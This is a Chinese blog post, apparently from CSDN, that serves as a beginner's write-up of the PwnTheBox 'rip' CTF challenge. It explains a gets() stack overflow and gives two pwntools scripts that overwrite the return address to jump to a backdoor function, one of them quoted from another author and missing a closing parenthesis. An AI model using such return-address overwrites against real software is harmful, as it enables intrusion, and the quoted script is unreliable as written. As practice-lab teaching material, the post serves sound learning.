pwnthebox-rip

最新推荐文章于 2022-11-29 12:38:33 发布
最新推荐文章于 2022-11-29 12:38:33 发布
阅读量2.5k 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHAWUCIREN1/article/details/121685518
版权

gets函数不限制输入的长度,存在溢出
在这里插入图片描述
查看栈空间,payload = 0xf + 8
在这里插入图片描述
发现fun()函数,
在这里插入图片描述
在这里插入图片描述

构造exp

from pwn import *
p = process('pwn1')
#p = remote('redirect.do-not-trust.hacking.run',10026)
payload = b'A'*0xF+ p64(0x401186)
p.sendline(payload)
p.interactive()

from pwn import *
io = remote('redirect.do-not-trust.hacking.run',10043)

context.log_level = 'debug'

payload = b"A"*(0xf + 8) +p64(0x401198)+ p64(0x401186 
io.sendline(payload)
io.interactive()

这个是网上一个师傅的exp,我调试了好久就是不行,看了这个还是不太懂为啥要加p64(0x401198)
先继续往后做吧!

参考链接:
https://blog.csdn.net/weixin_46436680/article/details/105853304?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2aggregatepagefirst_rank_ecpm_v1~rank_v31_ecpm-2-105853304.pc_agg_new_rank&utm_term=BUUCTF%E4%B8%ADrip&spm=1000.2123.3001.4430
http://blog.eonew.cn/archives/958

续梦人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PwnTheBox 刷题记录crypto篇
一颗小白菜的博客
08-29 506
首先定义一个函数,遍历str里面的字符,当字符的ascii值在给定范围内时就加上key再模26(97-122为大小写英文字符),key和str1未知,str2是str1加密后的结果,flag为str1MD5加密后的结果,并给了flag的部分字符。凯撒密码用密钥23加密后再base64解密得到flag(看wp才知道,这里可以用爆破,flagbase64加密后的内容为ZmxhZw==)再将得到的字符串synt{efnZ0erQ33crE}进行凯撒密码爆破得到flag。再base64解密,得到乱码。...
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4784
BUU CTF PWN 入门知识详解
pwnthebox pwn ciscn_2019_n_1 wp
weixin_49436541的博客
03-13 440
ciscn_2019 pwn
Pwn The Box——easysql
龙狼刺的博客
08-14 867
easysql。
rip(Pwn)
qq_45913417的博客
11-18 2344
IDA中SHIFT+F12: 漏洞点+后门已获得,开启乱杀之路: from pwn import * context.os = 'linux' context.arch = 'amd64' context.log_level = 'debug' # io = process('./pwn1') io = remote('redirect.do-not-trust.hacking.run', 10368) elf = ELF('./pwn1') // 由于该题目没有清除缓冲区,导致recv接收不到...
计算机网络实验-RIP实验报告.pdf
04-21
RIP实验报告,计算机网络实验 如果拓扑图如图 11-7 所示,应该如何配置才能使所有 PC 机相互通信? 如果是 3 个路由器组成的拓扑图如图 11-8 所示,应该如何配置才能使 所有 PC 机相互通信?
思科-RIP的基础配置
04-07
内容概要:配置RIP动态路由和默认路由,使用相应的RIP和静态两种路由协议实现网络的互通,加深对动态路由能够减少一定的配置量这一规律的理解。 适合人群:初学路由交换技术的学生、或者对路由交换与交换的人群。 ...
IP路由-RIP与静态路由-重复布.docx
02-24
IP 路由-RIP 与静态路由-重复布 本文档介绍了 IP 路由的配置,包括 RIP 路由和静态路由的配置,重点介绍了 RIP 路由协议的配置和静态路由的配置,以及它们之间的重发布机制。 一、网络拓扑环境 本文档的网络拓扑...
华为模拟器eNSP练习题-RIP
01-04
实验需要的网络拓扑,配置命令,topo
win7-32位安装Linotronic 530-RIP 30 v52.3.rar
07-31
win7-32位安装Linotronic 530-RIP 30 v52.3.rar
pwnbox:有关如何创建自己的Pwnbox(最初由HTB创建)的说明
05-10
Pwnbox 对于使用Kali的用户,我在底部添加了一些步骤以在2020.3中获得新的zsh终端,以显示您的服务器/ IP 是否想复制Hack Box自己的Pwnbox? 请遵循以下指南! 这应该为您提供Hack The Box使用的pwnbox的“外观”。 此处显示的所有内容都可以在您自己的Parrot OS中完成,无论是VM还是主OS。 但是,我建议您研究每个命令的功能,执行的位置以及如何根据自己的喜好自定义它。 对我来说,每当我进入Parrot机器时,它就会带给我有趣的hackthebox徽标。 继续,自己做吧! █ █ ▐▌ ▄█▄ █ ▄▄▄▄ █▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀ █ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█
PwnTheBox(web篇)---ezphp
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-08 727
文章目录PwnTheBox(web篇)---ezphp题目题解 PwnTheBox(web篇)—ezphp 题目 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
PwnTheBox-Jsfuck详解
x1520700的博客
05-27 1076
题目介绍 知识点: div盒子定义:包容js代码一切的东西,也就是F12查看器那的 Jsfuck是什么 控制台具有JSfuck解密的效果 编码认识:U2FsdGVkX1 是AES或DES 开头 一、审题、进行判断 进入题目,看见一个输入功能框,结合对xss的认识,又看见js误以为是xss注入,结果发现并不是; 通过仔细审题可以发现有一个定义词(JSPFUCK),网上百度一下,给了个介绍: ...
PwnTheBox(web篇)简单题
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-26 2945
PwnTheBox(web篇)简单题 第一页 exec1 hackergame2019-签到题 网页读取器 管理员本地访问 下载下载 快速计算 该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目 一道很奇怪的题目 奇葩的题目 验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行 黑曜石浏览器 信息安全
PWN概论
m0_52249553的博客
05-06 6432
什么是pwn pwn是ctf解题赛中的一个题目类别,它在黑客俚语中代表着攻破,获取权限,由“own”这个词引申而来。在CTF比赛中它代表着溢出类的题目,常见的类型有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。 学习pwn的知识储备 反汇编工具 在比赛中我们会拿到一个二进制文件(由c文件编译而来),我们要找出这个可执行文件的漏洞,但二进制文件是由0和1的机器码组成,正常人是直接无法看懂里面的内容的,这时我们需要利用反编译工具将这个二进制文件反编译为我们能看懂的语言(汇编语言或者c语言
PwnTheBox
硫酸超的博客
11-30 928
靶场地址 右键查看源代码 <html> <head> <title>Welcome to PwnTheBox</title> <meta charset="utf-8"> </head> <body> <h3 align="center">欢迎来到PwnTheBox大学</h3> <p>PwnTheBox大学(PwnTheBox University)简称PTB,建校于5YWs5Y
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1085
反序列化
PwnTheBox,Web:信息安全 2077
Pai_Space
06-05 190
2019 hackgame
UAF之hackthebox_pwn_little tommy
Vicl1fe的博客
09-21 934
题目网址:hackthebox qq讨论群:946220807 前言:这道题考察了堆利用的UAF漏洞,这也应该是我第一次独立自主的完成一个堆题。 UAF 这里不细说了,详情:传送门。简单来说,UAF漏洞本质是free(point)后,point指针还可使用,还指向原来的值。 分析 该程序实现4个功能 创建用户 显示用户 删除用户 添加备忘录 打印flag。 先看看创建用户: 调用了mallo...
npm install meta-sam-rip 下载了包,但是引用报错,说找不到meta-sam-rip
最新发布
05-31
如果您已经通过 `npm install meta-sam-rip` 安装了 ... 'meta-sam-rip-button': Button } // ... <meta-sam-rip-button /> ``` 如果以上步骤仍然没有解决您的问题,请提供更多详细信息,我会尽力帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值